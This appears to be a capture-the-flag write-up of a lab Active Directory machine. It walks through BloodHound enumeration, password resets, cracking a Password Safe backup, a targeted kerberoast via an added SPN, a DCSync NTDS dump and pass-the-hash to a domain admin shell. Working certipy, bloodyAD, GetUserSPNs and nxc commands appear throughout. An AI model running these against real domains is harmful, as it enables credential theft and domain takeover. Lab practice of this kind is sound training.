# Lessons Learned - When we see `GenericWrite`, think shadow creds attack - Skip `certipy-ad` enum and shadow creds attacks if ADCS is not enabled - If there is a missing gap in the AD attack chain, climb the chain as far as you can go and enumerate further --- # After-Action Attack Sequence - After running `rusthound-ce` with given creds, we see a clear path from olivia to benjamin - Also, we see a path from emily to ethan who can DCSync - But, we have a gap between benjamin and emily - Laterally move from olivia to benjamin with the help of `bloody-AD` - Conduct additional enum of SMB and FTP as benjamin - This leads us to `Backup.psafe3` on the FTP server - Use `psafe2john` and crack password to `psafe` with `john` - This provides the password for emily - Laterally move from emily to benjamin by adding an SPN to benjamin and kerberoasting - Perform the DCSync with `nxc smb [...] --ntds` in lieu of `secretsdump.py` - PtH with `evil-winrm` to gain an interactive shell on the DC as administrator --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260319180006.png]] - `nmap` scan - light ![[images/Pasted image 20260319180033.png]] - Looks like a DC - `nmap` scan - detailed ![[images/Pasted image 20260319181339.png]] - Note: Significant clock skew > use `rdate` or `faketime` when issuing Kerberos or ADCS related commands - Add `administrator.htb` to `/etc/hosts` --- # Service Enum ## Port 445 (SMB) ### Shares - Use given creds to enum shares![[images/Pasted image 20260319181915.png]] - Nothing in the default shares - Revisit when we get creds for other users ### Users - Enum password policy ![[images/Pasted image 20260319182000.png]] - Enum users ![[images/Pasted image 20260319181903.png]] - Create `users.txt` based on above ![[images/Pasted image 20260319182306.png]] ## Port 21 (FTP): Microsoft ftpd - Cannot login as Olivia ![[images/Pasted image 20260319183117.png]]![[images/Pasted image 20260319183006.png]] - Revisit when we get creds for other users --- # AD Enum ## ASREP Roasting - Nope ![[images/Pasted image 20260319183351.png]] ## Kerberoasting - Nope ![[images/Pasted image 20260319195555.png]] - As an alternative to `GetSPNUsers.py`, use `nxc` as below ```bash nxc ldap TARGET -d inlanefreight.local -u username -p password --kerberoasting ``` ## ADCS - Nope ![[images/Pasted image 20260319183545.png]] ## BloodHound - Run `rusthound-ce` ![[images/Pasted image 20260319183810.png]] - Spin up container for BloodHound GUI - Having issues; follow below steps for a hard reset ```bash docker compose down -v docker compose up -d docket compose logs -f | grep -i Pass # search for initial password in docker logs ``` - emily is a member of remote management users ![[images/Pasted image 20260319194319.png]] - chain stops at benjamin - ethan has DCSync privs ![[images/Pasted image 20260319193915.png]] - emily has GenericWrite over ethan ![[images/Pasted image 20260319194116.png]] - Note: we need to bridge the gap from benjamin to emily --- # AD Attack Chain ## Lateral Movement: Olivia to Benjamin ![[images/Pasted image 20260319195141.png]] - Change password for michael as olivia ![[images/Pasted image 20260319200738.png]] - Change password for benjamin as michael ![[images/Pasted image 20260319200743.png]] --- # Revisit Service Enum: Benjamin - Enum shares ![[images/Pasted image 20260319201029.png]] - Enum ftp ![[images/Pasted image 20260319201119.png]] - Maybe `Backup.psafe3` on the FTP server is the bridge to emily? ![[images/Pasted image 20260319201256.png]] ## Break into `Backup.psafe3` - We need a password to access this ![[images/Pasted image 20260319201507.png]] - Look to see if there is a `pwsafe2john` > yes! ![[images/Pasted image 20260319201636.png]] - Try to crack with `john` > success! ![[images/Pasted image 20260319201823.png]] - We have passwords for alexander, emma, and emily ![[images/Pasted image 20260319201942.png]] - Of course, emily is the target here as we saw above from the bloodhound output - Confirm with `nxc smb` > We cooking now! ![[images/Pasted image 20260319202337.png]] --- # PWN DC ![[images/Pasted image 20260319202949.png]] ## Lateral Movement: emily to ethan - We know that emily has GenericWrite over ethan - We can abuse this with a shadow creds attack or by adding an SPN to ethan and subsequently kerberoasting ethan ### Shadow Creds Attack - Try a shadow creds attack as emily to get hash for ethan - Getting SSL wrapping error > some Googling shows that this is because port 636 is tcpwrapped as we saw in the nmap output ```bash faketime "$(ntpdate -q 10.129.6.230 | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username [email protected] -p "password" -dc-ip 10.129.6.230 -account ethan ``` - Try workaround below ```bash faketime "$(ntpdate -q 10.129.6.230 | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username [email protected] -p "password" -dc-ip 10.129.6.230 -account ethan -ldap-scheme ldap -ldap-port 389 -no-ldap-channel-binding -no-ldap-signing ``` - Still getting errors > maybe this is because there is no ADCS ![[images/Pasted image 20260319204333.png]] ### Kerberoasting - First, enumerate DN for ethan ![[images/Pasted image 20260319204635.png]] - Second, write SPN for ethan ``` bloodyAD --dc-ip 10.129.6.230 -d administrator.htb -u emily -p "password" set object ethan servicePrincipalName -v 'pwn/pwn' ``` ![[images/Pasted image 20260319204932.png]] - Third, kerberoast ethan ```bash faketime "$(ntpdate -q 10.129.6.230 | cut -d ' ' -f 1,2)" GetUserSPNs.py administrator.htb/emily:"password" -dc-ip 10.129.6.230 -request-user ethan -output ethan.hash ``` ![[images/Pasted image 20260319205035.png]] - Fourth, crack TGS ![[images/Pasted image 20260319205439.png]] ## Perform DCSync - In lieu of `secretsdump.py`, run `nxc smb [...] --ntds` ```bash nxc smb 10.129.6.230 -d administrator.htb -u ethan -p password --ntds ``` ![[images/Pasted image 20260319205903.png]] - PtH with `evil-winrm` > that's a wrap! ![[images/Pasted image 20260319205925.png]]